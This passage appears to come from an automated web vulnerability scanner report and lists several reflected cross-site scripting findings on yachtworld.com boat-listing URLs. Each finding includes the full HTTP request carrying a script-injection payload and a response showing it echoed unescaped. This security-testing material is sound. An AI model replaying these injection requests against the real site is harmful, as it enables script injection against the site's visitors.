%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2270278&boat_id=2270278&back=/core/boats/2005/Regulator-32-Fs-2270278/Placida/FLe586c"><script>alert(1)</script>698b112f45f/United-States&boat_id=2270278">
...[SNIP]...

3.127. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae42d"><script>alert(1)</script>3ebcd390f93 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-Statesae42d"><script>alert(1)</script>3ebcd390f93 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:07 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sat, 22 Jan 2011 03:59:44 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:06 GMT
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2270278&boat_id=2270278&back=/core/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-Statesae42d"><script>alert(1)</script>3ebcd390f93&boat_id=2270278">
...[SNIP]...

3.128. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59c74"><script>alert(1)</script>ac797cbcf62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States?59c74"><script>alert(1)</script>ac797cbcf62=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:39 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sat, 22 Jan 2011 03:59:44 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:39 GMT
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?59c74"><script>alert(1)</script>ac797cbcf62=1&slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2270278&boat_id=2270278&back=/core/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States&boat_id=2270278">
...[SNIP]...

3.129. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a53ce"><script>alert(1)</script>94ac4aa25e6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-Center-Console-1990703/Bricka53ce"><script>alert(1)</script>94ac4aa25e6/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:43 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 17 Dec 2010 17:08:15 GMT
Content-Language: en-US
